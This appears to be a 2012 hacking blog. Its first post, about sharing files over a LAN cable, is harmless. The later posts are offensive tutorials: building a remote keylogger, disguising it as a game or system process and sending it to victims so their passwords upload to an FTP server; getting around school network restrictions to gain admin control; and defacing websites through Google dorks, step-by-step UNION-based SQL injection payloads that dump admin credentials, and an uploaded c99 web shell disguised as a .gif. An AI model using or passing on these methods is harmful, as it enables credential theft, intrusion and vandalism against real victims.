Friday, 19 October 2012


In this article we will find out  how to transfer data using lan cable from one laptop to another laptop.Being not a very big fan of large pen drives to share large files ( big games) the only thing i am left with is using lan cable .

When to use lan cable

This method is most usefull when we have to share large files between two computers.

It would be very tiring to keep on inserting and removing the pen drive again and again.this is when lan cable comes into the picture , you have to connect it once and then leave it and when you come back you data would be transfer .No need to stand there and waste your time by looking at it.
Using a wired connection the speed is also impressive , generally better than pen drive.

Things that you required

Two laptop (mandatory)
A lan cable (obviously)
Little bit of your time and patience (only if it’s your first time)
Difficulty : moderate
Before we start make sure that the two computers are well connected through the lan cable.
OK now you have to enable sharing option .
Control PanelNetwork and InternetNetwork and Sharing CenterAdvanced sharing settings/
Make sure you turn on network detection.

Follow this simple steps now

1. Open control panel Control Panel >> Network and Internet >>Network Connections
2. You will see Local Area Connection 2 .
3. Right click it and navigates to properties .
4. You will see tcp/ ivp4 option there and select it’s properties .
5. Select this use the following ip address

Put the following value on 1st laptop

Ip address          
Subnet mask
Default gateway

Put the following value on 2st laptop

Ip address
Subnet mask
Default gateway

If everything went good you will see the two computer name in the Networks.

How to share a folder on lan ??

Assuming that you have connected the cable properly and enable the sharing option now it’s time to share your data , this one is pretty simple
1.Select the folder you want to share , right click it .
2.Select share this >> specific people.
3. On the drop down menu select everyone >> add >> click share.

Thursday, 11 October 2012


Note:This is just for educational pourpose only dont ever missuse this.........Yr

How to Hack Facebook using Remote keylogger???

Q) What is a keylogger?
A) A keylogger is a program or software which logs or track the keystrokes by the user and saves them into a file.

Q) Where does it saves the Keylogs?
A) It saves the logs into a text file which is present either in windows directory or in cache memory .

Q) Since it saves logs in the Pc ,do i need physical access to that computer?
A) Not necessarily ,It depends on the keylogger you are using .If you are using a remote keylogger you dont need physical access to that computer. The logger will automatically upload the logs to your **FTP SERVER** ,website,email...

Files needed :-

Steps:-1) Download and extract all the files.
2) Open FKS 2.0.exe
3) Server name : enter any name you want but it should resemble to something related to windows processes ,something like "csrsss.exe" or "explore.exe".
4) Reg key : leave it as it is.
5) Remove file : You could enter any weird name.
6) Victim name : enter your victim 's name .
7) Get and exec : Leave it as it is.
8) Go to Logging options by clicking on "logging Options" in Left side.
9) Log File Name : Enter your victim 's name with a .txt extension ex rishabh.txt
10) When log gets _____ bytes long, upload it . : Enter 5000.
11) Go to "Upload Options" .
12) Enter the Ftp server details accordingly Server host in "ftp server" ,user name in "FTP user" ,password in FTP password and /victimname in "upload dir".
13)After that click on build server and your keylogger will create a file named server.exe in the keylogger directory i.e. the folder where you extracted the Fks files.
14)Rename server.exe with something cooler like "counter strike 1.6" or anything else.
15)Send this file to your Victims .As soon as he executes the file ,His logs will start uploading at your Ftp server.
16)After that open Filezilla and fill your Ftp details.Then it will show 2 columns one containing your Hard disk data in the right side and other in the left will be your Files in your web hosting account . Download the logs to your pc and Serach for email accounts and their passwords.
You will find many other intersting things too in that file like what your victim searches on google,what does he do almost everything he types !!

Next Tutorial:-In my upcoming posts I m going to tell you about how to use this technique more efficiently i.e. How to change icon of your server ,how to protect it from antivirus,Etc.

NOTE:-This tutorial is for educational purposes only,Use at your own risk.Learn to hack is not responsible for any type of mishappening caused due to this information!!


Stay Hungry,Stay Foolish..........Mr Jobs

Monday, 8 October 2012


How to become Admin on your school/collage  Network::..

This tutorial is for those newbies out there, wanting to “hack” their school.

Im gonna start by saying, if your going to hack the school, theres a high probability your get caught, and dont do anything dumb like deleting the network. Its lame, and you will get flamed for doing it. This hack will only allow you to hack the computer at a terminal connected to the network. If you want to remote hack your school, ask google.

Firstly get a feel for the layout of the network.. you can do this quickly by:

Start > Programs(Right Click) > Explore

this will give you a map of the network, and you’ll probably be able to edit and run files this way, but with DOS there’s more options…

The basics for school hacking is accessing the command prompt, and 90% of school will have blocked this.

So to get around this you can do two things:

1) input this into the IE address “C:windows\system32\cmd.exe”

however this is very likely to be disabled.

2) Creating a Bat file to open Command Prompt.

You can do this by, opening IE > view > source.

once you have notepad open, where gonna make a .BAT file.

we want the BAT file to open up command prompt, so we type:

“CMD” without the “” press ENTER then save it as file.BAT.

Now you should be able to open Command Prompt by clicking on the file. If it fails to open, it is most likely that the CMD.exe is disabled and you dont have the privilages to run it.

So try using the file COMMAND instead. This does not have the same power as CMD, but is better than nothing.

Once we have it open now comes the good bit….

Before doing this, make sure you know a good lot of DOS commands.

Heres a great list

These are a few that you might like to try:

Net send * “Haseeb’s articles are cool”

Shutdown -s -f –m\\ip-of-computer– rarely works (you can find Ip with Ip scanner)

These will only work if you have the privilages to use them.

After you have access into Command Prompt, to get access to some programs that you are not allowed to use, DIR for Shortcuts (lnk). Then save them onto floppy disk. A shortcut is good, because it is smaller and quicker to save than a whole exe file.

There is also a good chance that the network will have RAT’s installed. A RAT is a (Remote Administration Tool). Used by Admins to manage networks… a bit like a friendly trojan.

This shouldnt be hard to find, and once you have found the EXE or LNK save it to a floppy, – Now you have control over every computer!!

You could use the RAT to use the admins machine, here possibilites are endless!

Saturday, 6 October 2012


I Am Not responsible for any Misuse of these Tutorials.
These are Just for Educational Purposes...So Don't Misuse Them!


Defacing a website simply means that we replace the index.html file of a site by our file. Now all the Users that open it will see our Page(i.e being uploaded by us).
For Defacing a website, three things that you need Most are:
1. SQL Injection(For analyzing website loops)
2. Admin Password
3. Shell Script (for getting Admin Controls)

Now Lets Start the Tutorial:

First of all I would Like to say that I have took some part of SQL injection Tutorial from my previous posts and a site .Most of the Part is written by me so if you have any doubts I will clear them....

1. Finding the Target and the Admin Password

First of all we must find out our target website. I have collected a lot of dorks i.e the vulnerability points of the websites. Some Google Searches can be awesomely utilized to find out vulnerable Websites.. Below is example of some queries..
Examples: Open the Google and copy paste these queries...

Here are some More Queries (use them without quotation marks)..

"comersus_listCategoriesAndProducts.asp?idCategory ="
"productlist.asp?ViewType=Category&CategoryID= "

Now The Admin password Hacking procedure starts:

You can also refer to my previous post of hacking websites:

Hacking websites : How to hack websites By using SQL Injection

1). Check for vulnerability

Let's say that we have some site like this

Now to test if is vulrnable we add to the end of url ' (quote),

so if we get some error like
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."
or something similar that means the Site is vulnerable to SQL injection.

2). Find the number of columns

To find number of columns we use statement ORDER BY (tells database how to order the result) so how to use it? Well just incrementing the number until we get an error. order by 1/* <-- no error order by 2/* <-- no error order by 3/* <-- no error order by 4/* <-- error (we get message like this Unknown column '4' in 'order clause' or something like that)

that means that the it has 3 columns, cause we got an error on 4.

3). Check for UNION function

With union we can select more data in one sql statement.

So we have union all select 1,2,3/* (we already found that number of columns are 3 in section 2). )

if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works .

4). Check for MySQL version union all select 1,2,3/* NOTE: if /* not working or you get some error, then try --

it's a comment and it's important for our query to work properly.

Let say that we have number 2 on the screen, now to check for version
we replace the number 2 with @@version or version() and get someting like 4.1.33-log or 5.0.45 or similar.

it should look like this union all select 1,@@version,3/*

If you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..."

I didn't see any paper covering this problem, so i must write it .

What we need is convert() function

i.e. union all select 1,convert(@@version using latin1),3/*

or with hex() and unhex()

i.e. union all select 1,unhex(hex(@@version)),3/*

and you will get MySQL version .

5). Getting table and column name

well if the MySQL version is < 5 (i.e 4.1.33, 4.1.12...) <--- later i will describe for MySQL > 5 version.
we must guess table and column name in most cases.

common table names are: user/s, admin/s, member/s ...

common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc...

i.e would be union all select 1,2,3 from admin/* (we see number 2 on the screen like before, and that's good )

We know that table admin exists...

Now to check column names. union all select 1,username,3 from admin/* (if you get an error, then try the other column name)

we get username displayed on screen, example would be admin, or superadmin etc...

now to check if column password exists union all select 1,password,3 from admin/* (if you get an error, then try the other column name)

we seen password on the screen in hash or plain-text, it depends of how the database is set up
i.e md5 hash, mysql hash, sha1...

Now we must complete query to look nice

For that we can use concat() function (it joins strings)

i.e union all select 1,concat(username,0x3a,password),3 from admin/*
Note that i put 0x3a, its hex value for : (so 0x3a is hex value for colon)

(there is another way for that, char(58), ascii value for : ) union all select 1,concat(username,char(58),password),3 from admin/*
Now we get dislayed username:password on screen, i.e admin:admin or admin:somehash

When you have this, you can login like admin or some superuser.

If can't guess the right table name, you can always try mysql.user (default)

It has user password columns, so example would be union all select 1,concat(user,0x3a,password),3 from mysql.user/*

6). MySQL 5

Like i said before i'm gonna explain how to get table and column names
in MySQL > 5.

For this we need information_schema. It holds all tables and columns in database.

to get tables we use table_name and information_schema.tables.

i.e union all select 1,table_name,3 from information_schema.tables/*

here we replace the our number 2 with table_name to get the first table from information_schema.tables
displayed on the screen. Now we must add LIMIT to the end of query to list out all tables.

i.e union all select 1,table_name,3 from information_schema.tables limit 0,1/*
note that i put 0,1 (get 1 result starting from the 0th)

now to view the second table, we change limit 0,1 to limit 1,1

i.e union all select 1,table_name,3 from information_schema.tables limit 1,1/*
the second table is displayed.

for third table we put limit 2,1

i.e union all select 1,table_name,3 from information_schema.tables limit 2,1/*

Keep incrementing until you get some useful like db_admin, poll_user, auth, auth_user etc...

To get the column names the method is the same.

here we use column_name and information_schema.columns

the method is same as above so example would be union all select 1,column_name,3 from information_schema.columns limit 0,1/*
The first column is diplayed.

The second one (we change limit 0,1 to limit 1,1)

ie. union all select 1,column_name,3 from information_schema.columns limit 1,1/*

The second column is displayed, so keep incrementing until you get something like

username,user,login, password, pass, passwd etc...

If you wanna display column names for specific table use this query. (where clause)

Let's say that we found table users.

i.e union all select 1,column_name,3 from information_schema.columns where table_name='users'/*
Now we get displayed column name in table users. Just using LIMIT we can list all columns in table users.

Note that this won't work if the magic quotes is ON.

Let's say that we found colums user, pass and email.

Now to complete query to put them all together.

For that we use concat() , i decribe it earlier.

i.e union all select 1,concat(user,0x3a,pass,0x3a,email) from users/

What we get here is user:pass:email from table users.


** If you are too lazy for doing above stuff you can use tools they will do all the job:

1) Exploit scanner (this will find vulnerable websites)

2) SQLi helpper (this tool will do all the injecting job and get you the pass or hash)

*** use the tools only if you are new to hacking. Do it manually thats the thrill and that is real hacking. When you do it manually you will understand the concept.

In some websites you can directly see the password but most of the websites encrypt them using MD5. so u hav to crack the hash to get the password.

To crack the password there are three ways

1) Check the net whether this hash is cracked before:

2) Crack the password with the help of a site:

3) Use a MD5 cracking software:

Password = OwlsNest


After getting the password you can login as the admin of the site. But first you have to find the admin login page for the site. there r three methods to find the admin panel.

1) You can use an admin finder website:

2) You can use an admin finder software:

After logging in as the admin you can upload photos to the site. so now you are going to upload a shell into the site using this upload facility.

Extract it you will get a c99.php upload it.
Some sites wont allow you to upload a php file. so rename it as c99.php.gif
Then upload it.

After that go to (in most sites images are saved in this dir but if you cant find c99 there then you have to guess the dir)

find the c99.php.gif and click it..

Now you can see a big control pannel....
Now you can do what ever you want to do...
Search for the index.html file and replace it with your own file.
So if any one goes to that site they will see your page....
After Doing This click on Logout and You are Done..

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Warning plz dont misuse this info this is just for education pourpose only........Yr

Always Stay Hungry, Stay Foolish........Mr Bhatt.